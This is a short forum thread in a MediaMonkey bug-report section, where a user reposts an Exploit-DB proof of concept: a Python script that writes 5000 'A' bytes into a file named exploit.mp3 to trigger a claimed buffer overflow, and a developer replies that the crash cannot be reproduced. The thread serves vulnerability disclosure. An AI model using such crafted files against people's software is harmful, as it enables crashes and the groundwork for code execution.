Mediamonkey 3.2.4.1304 (mp3) Buffer Overflow Vulnerability P

This forum is for reporting bugs in MediaMonkey for Windows 4. Note that version 4 is no longer actively maintained as it has been replaced by version 5.

Moderator: Gurus

some1
Posts: 91
Joined: Tue Jul 03, 2007 3:10 am

Mediamonkey 3.2.4.1304 (mp3) Buffer Overflow Vulnerability P

Post by some1 »

# Exploit Title: Mediamonkey 3.2.4.1304 (mp3) Buffer Overflow Vulnerability PoC
# Date: 12/04/2010
# Author: 0v3r
# Software Link: http://www.mediamonkey.com/download/?dir=download
# Version: 3.2.4.1304
# Tested on: Windows XP SP3 EN
# CVE: N/A


#!/usr/bin/python

buff = "\x41" * 5000

try:
f = open("exploit.mp3",'w')
f.write(buff)
f.close()
print "[-] File created!\n"
except:
print "[-] Error occured!\n"
Source: http://www.exploit-db.com/exploits/15669/
rusty
Posts: 8423
Joined: Tue Apr 29, 2003 3:39 am
Location: Montreal, Canada

Re: Mediamonkey 3.2.4.1304 (mp3) Buffer Overflow Vulnerabili

Post by rusty »

We're not able to replicate this vulnerability (tested on Win7 and XP, DEP enabled/disabled). If anyone is able to replicate, please let us know.

Thanks.

-Rusty
some1
Posts: 91
Joined: Tue Jul 03, 2007 3:10 am

Re: Mediamonkey 3.2.4.1304 (mp3) Buffer Overflow Vulnerabili

Post by some1 »

Image
Post Reply